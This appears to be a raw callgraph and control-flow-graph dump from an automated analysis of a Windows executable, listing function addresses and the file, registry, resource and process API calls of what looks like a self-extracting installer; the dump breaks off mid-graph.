RegQueryInfoKeyA 2661->2663 2664 a925e3 2661->2664 2662->2664 2666 a9259b RegOpenKeyExA 2662->2666 2665 a925d1 RegCloseKey 2663->2665 2664->2306 2665->2664 2666->2664 2667 a925bc RegQueryValueExA 2666->2667 2667->2665 2669 a93bdb 2668->2669 2690 a93bec 2668->2690 2671 a9468f 7 API calls 2669->2671 2670 a93c03 memset 2670->2690 2671->2690 2672 a9468f 7 API calls 2672->2690 2673 a93d13 2674 a944b9 20 API calls 2673->2674 2701 a93d26 2674->2701 2676 a93f4d 2677 a96ce0 4 API calls 2676->2677 2678 a93f60 2677->2678 2678->2311 2679 a93d7b CompareStringA 2680 a93fd7 2679->2680 2679->2690 2680->2676 3004 a92267 2680->3004 2681 a93fab 2684 a944b9 20 API calls 2681->2684 2685 a93fbe LocalFree 2684->2685 2685->2676 2686 a93f1e LocalFree 2686->2680 2686->2690 2687 a93f46 LocalFree 2687->2676 2690->2670 2690->2672 2690->2673 2690->2676 2690->2679 2690->2680 2690->2681 2690->2686 2690->2687 2691 a93cc7 CompareStringA 2690->2691 2702 a93e10 2690->2702 2914 a91ae8 2690->2914 2954 a9202a memset memset RegCreateKeyExA 2690->2954 2980 a93fef 2690->2980 2691->2690 2692 a93e1f GetProcAddress 2694 a93f64 2692->2694 2692->2702 2693 a93f92 2695 a944b9 20 API calls 2693->2695 2696 a944b9 20 API calls 2694->2696 2697 a93fa9 2695->2697 2698 a93f75 FreeLibrary 2696->2698 2699 a93f7c LocalFree 2697->2699 2698->2699 2700 a96285 GetLastError 2699->2700 2700->2701 2701->2676 2702->2692 2702->2693 2703 a93eff FreeLibrary 2702->2703 2704 a93f40 FreeLibrary 2702->2704 2994 a96495 2702->2994 2703->2686 2704->2687 2706 a9468f 7 API calls 2705->2706 2707 a93a55 LocalAlloc 2706->2707 2708 a93a6c 2707->2708 2709 a93a8e 2707->2709 2710 a944b9 20 API calls 2708->2710 2711 a9468f 7 API calls 2709->2711 2712 a93a7d 2710->2712 2713 a93a98 2711->2713 2714 a96285 GetLastError 2712->2714 2715 a93a9c 2713->2715 2716 a93ac5 lstrcmpA 2713->2716 2720 a92f64 2714->2720 2717 a944b9 20 API calls 2715->2717 2718 a93ada 2716->2718 2719 a93b0d LocalFree 2716->2719 2721 a93aad LocalFree 2717->2721 2722 a96517 24 API calls 2718->2722 2719->2720 2720->2278 2720->2314 2721->2720 2723 a93aec LocalFree 2722->2723 2723->2720 2725 a9303c 2724->2725 2725->2314 2727 a9468f 7 API calls 2726->2727 2728 a9417d LocalAlloc 2727->2728 2729 a941a8 2728->2729 2730 a94195 2728->2730 2731 a9468f 7 API calls 2729->2731 2732 a944b9 20 API calls 2730->2732 2734 a941b5 2731->2734 2733 a941a6 2732->2733 2733->2314 2735 a941b9 2734->2735 2736 a941c5 lstrcmpA 2734->2736 2738 a944b9 20 API calls 2735->2738 2736->2735 2737 a941e6 LocalFree 2736->2737 2737->2733 2738->2737 2740 a9171e _vsnprintf 2739->2740 2741 a962c9 FindResourceA 2740->2741 2743 a962cb LoadResource LockResource 2741->2743 2744 a96353 2741->2744 2743->2744 2747 a962e0 2743->2747 2745 a96ce0 4 API calls 2744->2745 2746 a951ca 2745->2746 2746->2584 2746->2585 2748 a9631b FreeResource 2747->2748 2749 a96355 FreeResource 2747->2749 2750 a9171e _vsnprintf 2748->2750 2749->2744 2750->2741 2752 a9548a 2751->2752 2753 a9551a 2751->2753 2812 a953a1 2752->2812 2823 a958c8 2753->2823 2756 a95495 2757 a95581 2756->2757 2762 a9550c 2756->2762 2763 a954c2 GetSystemInfo 2756->2763 2759 a96ce0 4 API calls 2757->2759 2764 a9559a 2759->2764 2760 a9553b CreateDirectoryA 2765 a95577 2760->2765 2766 a95547 2760->2766 2761 a9554d 2761->2757 2769 a9597d 34 API calls 2761->2769 2767 a9658a CharPrevA 2762->2767 2774 a954da 2763->2774 2764->2625 2775 a92630 GetWindowsDirectoryA 2764->2775 2768 a96285 GetLastError 2765->2768 2766->2761 2767->2753 2770 a9557c 2768->2770 2771 a9555c 2769->2771 2770->2757 2771->2757 2773 a95568 RemoveDirectoryA 2771->2773 2772 a9658a CharPrevA 2772->2762 2773->2757 2774->2762 2774->2772 2776 a9266f 2775->2776 2777 a9265e 2775->2777 2779 a96ce0 4 API calls 2776->2779 2778 a944b9 20 API calls 2777->2778 2778->2776 2780 a92687 2779->2780 2780->2611 2780->2626 2782 a9696e GetDiskFreeSpaceA 2781->2782 2783 a969a1 2781->2783 2782->2783 2784 a96989 MulDiv 2782->2784 2783->2635 2784->2783 2786 a959bb 2785->2786 2787 a959dd GetDiskFreeSpaceA 2785->2787 2788 a944b9 20 API calls 2786->2788 2789 a95ba1 memset 2787->2789 2790 a95a21 MulDiv 2787->2790 2791 a959cc 2788->2791 2792 a96285 GetLastError 2789->2792 2790->2789 2793 a95a50 GetVolumeInformationA 2790->2793 2794 a96285 GetLastError 2791->2794 2795 a95bbc GetLastError FormatMessageA 2792->2795 2796 a95a6e memset 2793->2796 2797 a95ab5 SetCurrentDirectoryA 2793->2797 2809 a959d1 2794->2809 2798 a95be3 2795->2798 2799 a96285 GetLastError 2796->2799 2806 a95acc 2797->2806 2801 a944b9 20 API calls 2798->2801 2802 a95a89 GetLastError FormatMessageA 2799->2802 2800 a95b94 2804 a96ce0 4 API calls 2800->2804 2803 a95bf5 SetCurrentDirectoryA 2801->2803 2802->2798 2803->2800 2805 a95c11 2804->2805 2805->2611 2807 a95b0a 2806->2807 2810 a95b20 2806->2810 2808 a944b9 20 API calls 2807->2808 2808->2809 2809->2800 2810->2800 2835 a9268b 2810->2835 2814 a953bf 2812->2814 2813 a9171e _vsnprintf 2813->2814 2814->2813 2815 a9658a CharPrevA 2814->2815 2819 a95415 GetTempFileNameA 2814->2819 2816 a953fa RemoveDirectoryA GetFileAttributesA 2815->2816 2816->2814 2817 a9544f CreateDirectoryA 2816->2817 2818 a9543a 2817->2818 2817->2819 2821 a96ce0 4 API calls 2818->2821 2819->2818 2820 a95429 DeleteFileA CreateDirectoryA 2819->2820 2820->2818 2822 a95449 2821->2822 2822->2756 2824 a958d8 2823->2824 2824->2824 2825 a958df LocalAlloc 2824->2825 2826 a95919 2825->2826 2827 a958f3 2825->2827 2829 a9658a CharPrevA 2826->2829 2828 a944b9 20 API calls 2827->2828 2834 a95906 2828->2834 2832 a95931 CreateFileA LocalFree 2829->2832 2830 a96285 GetLastError 2831 a95534 2830->2831 2831->2760 2831->2761 2833 a9595b CloseHandle GetFileAttributesA 2832->2833 2832->2834 2833->2834 2834->2830 2834->2831 2836 a926b9 2835->2836 2837 a926e5 2835->2837 2838 a9171e _vsnprintf 2836->2838 2839 a926ea 2837->2839 2840 a9271f 2837->2840 2841 a926cc 2838->2841 2842 a9171e _vsnprintf 2839->2842 2846 a9171e _vsnprintf 2840->2846 2851 a926e3 2840->2851 2843 a944b9 20 API calls 2841->2843 2845 a926fd 2842->2845 2843->2851 2844 a96ce0 4 API calls 2847 a9276d 2844->2847 2848 a944b9 20 API calls 2845->2848 2849 a92735 2846->2849 2847->2800 2848->2851 2850 a944b9 20 API calls 2849->2850 2850->2851 2851->2844 2853 a9468f 7 API calls 2852->2853 2854 a94ff5 FindResourceA LoadResource LockResource 2853->2854 2855 a95020 2854->2855 2870 a9515f 2854->2870 2856 a95029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2855->2856 2857 a95057 2855->2857 2856->2857 2874 a94efd 2857->2874 2860 a95060 2861 a944b9 20 API calls 2860->2861 2867 a95075 2861->2867 2862 a95106 2865 a9511d 2862->2865 2866 a95110 FreeResource 2862->2866 2863 a950e8 2864 a944b9 20 API calls 2863->2864 2864->2867 2868 a9513a 2865->2868 2869 a95129 2865->2869 2866->2865 2867->2862 2868->2870 2873 a9514c SendMessageA 2868->2873 2872 a944b9 20 API calls 2869->2872 2870->2654 2871 a9507c 2871->2862 2871->2863 2872->2868 2873->2870 2876 a94f4a 2874->2876 2875 a94fa1 2878 a96ce0 4 API calls 2875->2878 2876->2875 2882 a94980 2876->2882 2879 a94fc6 2878->2879 2879->2860 2879->2871 2883 a94990 2882->2883 2884 a949c2 lstrcmpA 2883->2884 2885 a949a5 2883->2885 2887 a94a0e 2884->2887 2888 a949ba 2884->2888 2886 a944b9 20 API calls 2885->2886 2886->2888 2887->2888 2893 a9487a 2887->2893 2888->2875 2890 a94b60 2888->2890 2891 a94b92 FindCloseChangeNotification 2890->2891 2892 a94b76 2890->2892 2891->2892 2892->2875 2894 a948a2 CreateFileA 2893->2894 2896 a948e9 2894->2896 2897 a94908 2894->2897 2896->2897 2898 a948ee 2896->2898 2897->2888 2901 a9490c 2898->2901 2902 a948f5 CreateFileA 2901->2902 2904 a94917 2901->2904 2902->2897 2903 a94962 CharNextA 2903->2904 2904->2902 2904->2903 2905 a94953 CreateDirectoryA 2904->2905 2905->2903 2907 a9255b 2906->2907 2908 a92510 2906->2908 2910 a96ce0 4 API calls 2907->2910 2909 a9658a CharPrevA 2908->2909 2911 a92522 WritePrivateProfileStringA _lopen 2909->2911 2912 a92569 2910->2912 2911->2907 2913 a92548 _llseek _lclose 2911->2913 2912->2664 2913->2907 2915 a91b25 2914->2915 3018 a91a84 2915->3018 2917 a91b57 2918 a9658a CharPrevA 2917->2918 2920 a91b8c 2917->2920 2918->2920 2919 a966c8 2 API calls 2921 a91bd1 2919->2921 2920->2919 2922 a91bd9 CompareStringA 2921->2922 2923 a91d73 2921->2923 2922->2923 2924 a91bf7 GetFileAttributesA 2922->2924 2925 a966c8 2 API calls 2923->2925 2926 a91c0d 2924->2926 2927 a91d53 2924->2927 2928 a91d7d 2925->2928 2926->2927 2933 a91a84 2 API calls 2926->2933 2931 a944b9 20 API calls 2927->2931 2929 a91df8 LocalAlloc 2928->2929 2930 a91d81 CompareStringA 2928->2930 2929->2927 2932 a91e0b GetFileAttributesA 2929->2932 2930->2929 2939 a91d9b 2930->2939 2951 a91cc2 2931->2951 2934 a91e45 2932->2934 2942 a91e1d 2932->2942 2935 a91c31 2933->2935 3024 a92aac 2934->3024 2937 a91c50 LocalAlloc 2935->2937 2943 a91a84 2 API calls 2935->2943 2936 a91e89 2938 a96ce0 4 API calls 2936->2938 2937->2927 2940 a91c67 GetPrivateProfileIntA GetPrivateProfileStringA 2937->2940 2941 a91ea1 2938->2941 2939->2939 2944 a91dbe LocalAlloc 2939->2944 2947 a91cf8 2940->2947 2940->2951 2941->2690 2942->2934 2943->2937 2944->2927 2948 a91de1 2944->2948 2949 a91d09 GetShortPathNameA 2947->2949 2952 a91d23 2947->2952 2950 a9171e _vsnprintf 2948->2950 2949->2952 2950->2951 2951->2936 2953 a9171e _vsnprintf 2952->2953 2953->2951 2955 a9209a 2954->2955 2963 a92256 2954->2963 2957 a9171e _vsnprintf 2955->2957 2960 a920dc 2955->2960 2956 a96ce0 4 API calls 2958 a92263 2956->2958 2959 a920af RegQueryValueExA 2957->2959 2958->2690 2959->2955 2959->2960 2961 a920fb GetSystemDirectoryA 2960->2961 2962 a920e4 RegCloseKey 2960->2962 2964 a9658a CharPrevA 2961->2964 2962->2963 2963->2956 2965 a9211b LoadLibraryA 2964->2965 2966 a92179 GetModuleFileNameA 2965->2966 2967 a9212e GetProcAddress FreeLibrary 2965->2967 2969 a921de RegCloseKey 2966->2969 2972 a92177 2966->2972 2967->2966 2968 a9214e GetSystemDirectoryA 2967->2968 2970 a92165 2968->2970 2968->2972 2969->2963 2971 a9658a CharPrevA 2970->2971 2971->2972 2972->2972 2973 a921b7 LocalAlloc 2972->2973 2974 a921cd 2973->2974 2975 a921ec 2973->2975 2976 a944b9 20 API calls 2974->2976 2977 a9171e _vsnprintf 2975->2977 2976->2969 2978 a92218 RegSetValueExA RegCloseKey LocalFree 2977->2978 2978->2963 2981 a94016 CreateProcessA 2980->2981 2992 a94106 2980->2992 2982 a94041 WaitForSingleObject GetExitCodeProcess 2981->2982 2983 a940c4 2981->2983 2986 a94070 2982->2986 2985 a96285 GetLastError 2983->2985 2984 a96ce0 4 API calls 2987 a94117 2984->2987 2988 a940c9 GetLastError FormatMessageA 2985->2988 3051 a9411b 2986->3051 2987->2690 2990 a944b9 20 API calls 2988->2990 2990->2992 2991 a94096 CloseHandle CloseHandle 2991->2992 2993 a940ba 2991->2993 2992->2984 2993->2992 2995 a964c2 2994->2995 2996 a9658a CharPrevA 2995->2996 2997 a964d8 GetFileAttributesA 2996->2997 2998 a964ea 2997->2998 2999 a96501 LoadLibraryA 2997->2999 2998->2999 3000 a964ee LoadLibraryExA 2998->3000 3001 a96508 2999->3001 3000->3001 3002 a96ce0 4 API calls 3001->3002 3003 a96513 3002->3003 3003->2702 3005 a92289 RegOpenKeyExA 3004->3005 3006 a92381 3004->3006 3005->3006 3008 a922b1 RegQueryValueExA 3005->3008 3007 a96ce0 4 API calls 3006->3007 3009 a9238c 3007->3009 3010 a92374 RegCloseKey 3008->3010 3011 a922e6 memset GetSystemDirectoryA 3008->3011 3009->2676 3010->3006 3012 a9230f 3011->3012 3013 a92321 3011->3013 3015 a9658a CharPrevA 3012->3015 3014 a9171e _vsnprintf 3013->3014 3016 a9233f RegSetValueExA 3014->3016 3015->3013 3016->3010 3019 a91a9a 3018->3019 3021 a91aba 3019->3021 3023 a91aaf 3019->3023 3037 a9667f 3019->3037 3021->2917 3022 a9667f 2 API calls 3022->3023 3023->3021 3023->3022 3025 a92ad4 GetModuleFileNameA 3024->3025 3028 a92be6 3024->3028 3036 a92b02 3025->3036 3026 a96ce0 4 API calls 3029 a92bf5 3026->3029 3027 a92af1 IsDBCSLeadByte 3027->3036 3028->3026 3029->2936 3030 a92bca CharNextA 3033 a92bd3 CharNextA 3030->3033 3031 a92b11 CharNextA CharUpperA 3032 a92b8d CharUpperA 3031->3032 3031->3036 3032->3036 3033->3036 3035 a92b43 CharPrevA 3035->3036 3036->3027 3036->3028 3036->3030 3036->3031 3036->3033 3036->3035 3042 a965e8 3036->3042 3040 a96689 3037->3040 3038 a966a5 3038->3019 3039 a96648 IsDBCSLeadByte 3039->3040 3040->3038 3040->3039 3041 a96697 CharNextA 3040->3041 3041->3040 3043 a965f4 3042->3043 3043->3043 3044 a965fb CharPrevA 3043->3044 3045 a96611 CharPrevA 3044->3045 3046 a9660b 3045->3046 3047 a9661e 3045->3047 3046->3045 3046->3047 3048 a9663d 3047->3048 3049 a96634 CharNextA 3047->3049 3050 a96627 CharPrevA 3047->3050 3048->3036 3049->3048 3050->3048 3050->3049 3052 a94132 3051->3052 3054 a9412a 3051->3054 3055 a91ea7 3052->3055 3054->2991 3056 a91ed3 3055->3056 3057 a91eba 3055->3057 3056->3054 3058 a9256d 15 API calls 3057->3058 3058->3056 3060 a91ff0 RegOpenKeyExA 3059->3060 3061 a92026 3059->3061 3060->3061 3062 a9200f RegDeleteValueA RegCloseKey 3060->3062 3061->2321 3062->3061 3129 a919e0 3130 a91a03 3129->3130 3131 a91a24 GetDesktopWindow 3129->3131 3133 a91a16 EndDialog 3130->3133 3134 a91a20 3130->3134 3138 a943d0 6 API calls 3131->3138 3133->3134 3136 a96ce0 4 API calls 3134->3136 3137 a91a7e 3136->3137 3139 a94463 SetWindowPos 3138->3139 3141 a96ce0 4 API calls 3139->3141 3142 a91a33 LoadStringA SetDlgItemTextA MessageBeep 3141->3142 3142->3134 3143 a96a20 __getmainargs 3144 a969b0 3145 a969b5 3144->3145 3153 a96fbe GetModuleHandleW 3145->3153 3147 a969c1 __set_app_type __p__fmode __p__commode 3148 a969f9 3147->3148 3149 a96a0e 3148->3149 3150 a96a02 __setusermatherr 3148->3150 3155 a971ef _controlfp 3149->3155 3150->3149 3152 a96a13 3154 a96fcf 3153->3154 3154->3147 3155->3152 3156 a934f0 3157 a93504 3156->3157 3158 a935b8 3156->3158 3157->3158 3159 a9351b 3157->3159 3160 a935be GetDesktopWindow 3157->3160 3161 a93671 EndDialog 3158->3161 3162 a93526 3158->3162 3164 a9354f 3159->3164 3165 a9351f 3159->3165 3163 a943d0 11 API calls 3160->3163 3161->3162 3166 a935d6 3163->3166 3164->3162 3168 a93559 ResetEvent 3164->3168 3165->3162 3167 a9352d TerminateThread EndDialog 3165->3167 3170 a9361d SetWindowTextA CreateThread 3166->3170 3171 a935e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3166->3171 3167->3162 3169 a944b9 20 API calls 3168->3169 3172 a93581 3169->3172 3170->3162 3173 a93646 3170->3173 3171->3170 3174 a9359b SetEvent 3172->3174 3176 a9358a SetEvent 3172->3176 3175 a944b9 20 API calls 3173->3175 3177 a93680 4 API calls 3174->3177 3175->3158 3176->3162 3177->3158 3178 a96ef0 3179 a96f2d 3178->3179 3181 a96f02 3178->3181 3180 a96f27 ?terminate@ 3180->3179 3181->3179 3181->3180 3182 a97270 _except_handler4_common 3063 a94cc0 GlobalFree 3064 a96f40 SetUnhandledExceptionFilter 3183 a94bc0 3185 a94bd7 3183->3185 3186 a94c05 3183->3186 3184 a94c1b SetFilePointer 3184->3185 3186->3184 3186->3185 3187 a930c0 3188 a930de CallWindowProcA 3187->3188 3189 a930ce 3187->3189 3190 a930da 3188->3190 3189->3188 3189->3190 3191 a963c0 3192 a96407 3191->3192 3193 a9658a CharPrevA 3192->3193 3194 a96415 CreateFileA 3193->3194 3195 a96448 WriteFile 3194->3195 3196 a9643a 3194->3196 3197 a96465 CloseHandle 3195->3197 3199 a96ce0 4 API calls 3196->3199 3197->3196 3200 a9648f 3199->3200 3201 a93100 3202 a93111 3201->3202 3203 a931b0 3201->3203 3205 a93149 GetDesktopWindow 3202->3205 3209 a9311d 3202->3209 3204 a931b9 SendDlgItemMessageA 3203->3204 3207 a93141 3203->3207 3204->3207 3208 a943d0 11 API calls 3205->3208 3206 a93138 EndDialog 3206->3207 3210 a9315d 6 API calls 3208->3210 3209->3206 3209->3207 3210->3207 3211 a94200 3212 a9420b SendMessageA 3211->3212 3213 a9421e 3211->3213 3212->3213 3214 a96c03 3215 a96c1e 3214->3215 3216 a96c17 _exit 3214->3216 3217 a96c32 3215->3217 3218 a96c27 _cexit 3215->3218 3216->3215 3218->3217 3065 a94cd0 3066 a94d0b 3065->3066 3067 a94cf4 3065->3067 3068 a94d02 3066->3068 3071 a94dcb 3066->3071 3074 a94d25 3066->3074 3067->3068 3069 a94b60 FindCloseChangeNotification 3067->3069 3070 a96ce0 4 API calls 3068->3070 3069->3068 3073 a94e95 3070->3073 3072 a94dd4 SetDlgItemTextA 3071->3072 3075 a94de3 3071->3075 3072->3075 3074->3068 3088 a94c37 3074->3088 3075->3068 3093 a9476d 3075->3093 3078 a94e38 3078->3068 3080 a94980 25 API calls 3078->3080 3082 a94e56 3080->3082 3081 a94b60 FindCloseChangeNotification 3083 a94d99 SetFileAttributesA 3081->3083 3082->3068 3084 a94e64 3082->3084 3083->3068 3102 a947e0 LocalAlloc 3084->3102 3087 a94e6f 3087->3068 3089 a94c4c DosDateTimeToFileTime 3088->3089 3092 a94c88 3088->3092 3090 a94c5e LocalFileTimeToFileTime 3089->3090 3089->3092 3091 a94c70 SetFileTime 3090->3091 3090->3092 3091->3092 3092->3068 3092->3081 3111 a966ae GetFileAttributesA 3093->3111 3095 a9477b 3095->3078 3096 a947cc SetFileAttributesA 3097 a947db 3096->3097 3097->3078 3099 a96517 24 API calls 3100 a947b1 3099->3100 3100->3096 3100->3097 3101 a947c2 3100->3101 3101->3096 3103 a9480f LocalAlloc 3102->3103 3104 a947f6 3102->3104 3107 a94831 3103->3107 3110 a9480b 3103->3110 3105 a944b9 20 API calls 3104->3105 3105->3110 3108 a944b9 20 API calls 3107->3108 3109 a94846 LocalFree 3108->3109 3109->3110 3110->3087 3112 a94777 3111->3112 3112->3095 3112->3096 3112->3099 3113 a94ad0 3121 a93680 3113->3121 3116 a94ae9 3117 a94aee WriteFile 3118 a94b0f 3117->3118 3119 a94b14 3117->3119 3119->3118 3120 a94b3b SendDlgItemMessageA 3119->3120 3120->3118 3122 a93691 MsgWaitForMultipleObjects 3121->3122 3123 a936a9 PeekMessageA 3122->3123 3124 a936e8 3122->3124 3123->3122 3125 a936bc 3123->3125 3124->3116 3124->3117 3125->3122 3125->3124 3126 a936c7 DispatchMessageA 3125->3126 3127 a936d1 PeekMessageA 3125->3127 3126->3127 3127->3125 3219 a93210 3220 a9328e EndDialog 3219->3220 3221 a93227 3219->3221 3236 a93239 3220->3236 3222 a933e2 GetDesktopWindow 3221->3222 3223 a93235 3221->3223 3225 a943d0 11 API calls 3222->3225 3227 a932dd GetDlgItemTextA 3223->3227 3228 a9324c 3223->3228 3223->3236 3226 a933f1 SetWindowTextA SendDlgItemMessageA 3225->3226 3229 a9341f GetDlgItem EnableWindow 3226->3229 3226->3236 3237 a932fc 3227->3237 3252 a93366 3227->3252 3230 a93251 3228->3230 3231 a932c5 EndDialog 3228->3231 3229->3236 3232 a9325c LoadStringA 3230->3232 3230->3236 3231->3236 3234 a9327b 3232->3234 3235 a93294 3232->3235 3233 a944b9 20 API calls 3233->3236 3240 a944b9 20 API calls 3234->3240 3257 a94224 LoadLibraryA 3235->3257 3239 a93331 GetFileAttributesA 3237->3239 3237->3252 3243 a9337c 3239->3243 3244 a9333f 3239->3244 3240->3220 3242 a932a5 SetDlgItemTextA 3242->3234 3242->3236 3245 a9658a CharPrevA 3243->3245 3246 a944b9 20 API calls 3244->3246 3247 a9338d 3245->3247 3248 a93351 3246->3248 3249 a958c8 27 API calls 3247->3249 3248->3236 3250 a9335a CreateDirectoryA 3248->3250 3251 a93394 3249->3251 3250->3243 3250->3252 3251->3252 3253 a933a4 3251->3253 3252->3233 3254 a933c7 EndDialog 3253->3254 3255 a9597d 34 API calls 3253->3255 3254->3236 3256 a933c3 3255->3256 3256->3236 3256->3254 3258 a943b2 3257->3258 3259 a94246 GetProcAddress 3257->3259 3263 a944b9 20 API calls 3258->3263 3260 a9425d GetProcAddress 3259->3260 3261 a943a4 FreeLibrary 3259->3261 3260->3261 3262 a94274 GetProcAddress 3260->3262 3261->3258 3262->3261 3264 a9428b 3262->3264 3265 a9329d 3263->3265 3266 a94295 GetTempPathA 3264->3266 3270 a942e1 3264->3270 3265->3236 3265->3242 3267 a942ad 3266->3267 3267->3267 3268 a942b4 CharPrevA 3267->3268 3269 a942d0 CharPrevA 3268->3269 3268->3270 3269->3270 3271 a94390 FreeLibrary 3270->3271 3271->3265 3272 a94a50 3273 a94a9f ReadFile 3272->3273 3274 a94a66 3272->3274 3275 a94abb 3273->3275 3274->3275 3276 a94a82 memcpy 3274->3276 3276->3275 3277 a93450 3278 a9345e 3277->3278 3279 a934d3 EndDialog 3277->3279 3281 a9349a GetDesktopWindow 3278->3281 3285 a93465 3278->3285 3280 a9346a 3279->3280 3282 a943d0 11 API calls 3281->3282 3283 a934ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3282->3283 3283->3280 3284 a9348c EndDialog 3284->3280 3285->3280 3285->3284

                                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            • Opacity -> Relevance
                                                                                                                                                                                                                                            • Disassembly available
                                                                                                                                                                                                                                            callgraph 0 Function_00A92CAA 7 Function_00A918A3 0->7 12 Function_00A944B9 0->12 20 Function_00A9468F 0->20 30 Function_00A95C9E 0->30 31 Function_00A92390 0->31 42 Function_00A936EE 0->42 47 Function_00A96CE0 0->47 95 Function_00A96517 0->95 1 Function_00A92AAC 25 Function_00A91680 1->25 37 Function_00A965E8 1->37 1->47 62 Function_00A917C8 1->62 2 Function_00A966AE 3 Function_00A953A1 19 Function_00A9658A 3->19 3->25 3->47 91 Function_00A9171E 3->91 4 Function_00A96FA1 5 Function_00A955A0 5->12 5->19 5->20 21 Function_00A91781 5->21 26 Function_00A96285 5->26 5->47 78 Function_00A92630 5->78 5->95 104 Function_00A95467 5->104 107 Function_00A9597D 5->107 117 Function_00A96952 5->117 6 Function_00A94CA0 43 Function_00A917EE 7->43 7->47 8 Function_00A93BA2 8->12 8->20 8->21 8->26 34 Function_00A96495 8->34 35 Function_00A91AE8 8->35 39 Function_00A93FEF 8->39 8->47 70 Function_00A9202A 8->70 105 Function_00A92267 8->105 9 Function_00A972A2 10 Function_00A96FA5 113 Function_00A9724D 10->113 11 Function_00A91EA7 97 Function_00A9256D 11->97 12->25 12->47 59 Function_00A967C9 12->59 89 Function_00A9681F 12->89 12->91 13 Function_00A96FBE 119 Function_00A96F54 13->119 14 Function_00A969B0 14->13 40 Function_00A971EF 14->40 84 Function_00A97000 14->84 110 Function_00A96C70 14->110 15 Function_00A916B3 15->21 16 Function_00A952B6 16->21 16->31 16->37 44 Function_00A91FE1 16->44 16->47 17 Function_00A92A89 18 Function_00A9268B 18->12 18->47 18->91 19->15 22 Function_00A96380 23 Function_00A93680 24 Function_00A94980 24->12 106 Function_00A9487A 24->106 25->21 27 Function_00A91A84 108 Function_00A9667F 27->108 28 Function_00A94E99 28->25 29 Function_00A96298 29->47 29->91 30->12 30->19 30->25 46 Function_00A931E0 30->46 30->47 61 Function_00A966C8 30->61 71 Function_00A96E2A 30->71 94 Function_00A95C17 30->94 30->108 31->15 31->19 31->25 31->31 31->47 32 Function_00A91F90 32->11 32->12 32->47 33 Function_00A96793 34->19 34->21 34->47 35->1 35->12 35->15 35->19 35->21 35->25 35->27 35->47 35->61 35->91 36 Function_00A928E8 36->17 111 Function_00A92773 36->111 38 Function_00A970EB 39->12 39->26 39->47 87 Function_00A9411B 39->87 41 Function_00A96BEF 42->12 42->17 42->36 42->47 42->59 42->89 43->47 45 Function_00A94FE0 45->12 45->20 54 Function_00A94EFD 45->54 56 Function_00A96CF0 47->56 48 Function_00A924E0 48->19 48->47 49 Function_00A919E0 49->47 69 Function_00A943D0 49->69 50 Function_00A947E0 50->12 50->25 51 Function_00A951E5 51->12 51->20 51->26 52 Function_00A966F9 53 Function_00A92BFB 53->0 53->16 53->32 88 Function_00A92F1D 53->88 54->24 54->47 99 Function_00A94B60 54->99 55 Function_00A970FE 57 Function_00A934F0 57->12 57->23 57->69 58 Function_00A96EF0 59->33 60 Function_00A958C8 60->12 60->19 60->25 60->26 112 Function_00A96648 61->112 63 Function_00A94CC0 64 Function_00A94BC0 65 Function_00A930C0 66 Function_00A963C0 66->19 66->21 66->47 67 Function_00A94AD0 67->23 68 Function_00A94CD0 68->24 68->28 68->47 68->50 79 Function_00A94C37 68->79 86 Function_00A94702 68->86 98 Function_00A9476D 68->98 68->99 69->47 70->12 70->19 70->47 70->91 71->56 72 Function_00A97120 73 Function_00A96A20 74 Function_00A94224 74->12 74->25 75 Function_00A93B26 75->29 75->45 75->95 76 Function_00A93A3F 76->12 76->20 76->26 76->95 77 Function_00A96C3F 78->12 78->47 80 Function_00A97208 81 Function_00A9490C 82 Function_00A93100 82->69 83 Function_00A94200 85 Function_00A96C03 85->113 86->15 86->25 87->11 88->5 88->8 88->12 88->19 88->26 88->47 88->51 88->75 88->76 90 Function_00A9621E 88->90 96 Function_00A94169 88->96 88->97 103 Function_00A95164 88->103 89->47 89->52 90->12 90->26 90->47 90->107 92 Function_00A97010 93 Function_00A93210 93->12 93->19 93->60 93->69 93->74 93->107 95->12 96->12 96->20 97->48 98->2 98->95 100 Function_00A96A60 100->53 100->77 100->80 101 Function_00A97060 100->101 100->113 118 Function_00A97155 100->118 101->72 101->92 102 Function_00A96760 103->12 103->20 103->29 104->3 104->19 104->21 104->25 104->26 104->47 104->60 104->107 105->19 105->47 105->91 106->81 107->12 107->18 107->26 107->47 108->112 109 Function_00A97270 111->19 111->21 111->25 111->47 114 Function_00A96F40 115 Function_00A94A50 116 Function_00A93450 116->69 119->80 119->113

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 36 a93ba2-a93bd9 37 a93bdb-a93bee call a9468f 36->37 38 a93bfd-a93bff 36->38 46 a93d13-a93d30 call a944b9 37->46 47 a93bf4-a93bf7 37->47 39 a93c03-a93c28 memset 38->39 41 a93c2e-a93c40 call a9468f 39->41 42 a93d35-a93d48 call a91781 39->42 41->46 53 a93c46-a93c49 41->53 48 a93d4d-a93d52 42->48 58 a93f4d 46->58 47->38 47->46 51 a93d9e-a93db6 call a91ae8 48->51 52 a93d54-a93d6c call a9468f 48->52 51->58 69 a93dbc-a93dc2 51->69 52->46 65 a93d6e-a93d75 52->65 53->46 56 a93c4f-a93c56 53->56 61 a93c58-a93c5e 56->61 62 a93c60-a93c65 56->62 59 a93f4f-a93f63 call a96ce0 58->59 66 a93c6e-a93c73 61->66 67 a93c75-a93c7c 62->67 68 a93c67-a93c6d 62->68 71 a93d7b-a93d98 CompareStringA 65->71 72 a93fda-a93fe1 65->72 73 a93c87-a93c89 66->73 67->73 76 a93c7e-a93c82 67->76 68->66 74 a93dc4-a93dce 69->74 75 a93de6-a93de8 69->75 71->51 71->72 79 a93fe8-a93fea 72->79 80 a93fe3 call a92267 72->80 73->48 82 a93c8f-a93c98 73->82 74->75 81 a93dd0-a93dd7 74->81 77 a93f0b-a93f15 call a93fef 75->77 78 a93dee-a93df5 75->78 76->73 94 a93f1a-a93f1c 77->94 83 a93fab-a93fd2 call a944b9 LocalFree 78->83 84 a93dfb-a93dfd 78->84 79->59 80->79 81->75 87 a93dd9-a93ddb 81->87 88 a93c9a-a93c9c 82->88 89 a93cf1-a93cf3 82->89 83->58 84->77 92 a93e03-a93e0a 84->92 87->78 95 a93ddd-a93de1 call a9202a 87->95 90 a93c9e-a93ca3 88->90 91 a93ca5-a93ca7 88->91 89->51 93 a93cf9-a93d11 call a9468f 89->93 98 a93cb2-a93cc5 call a9468f 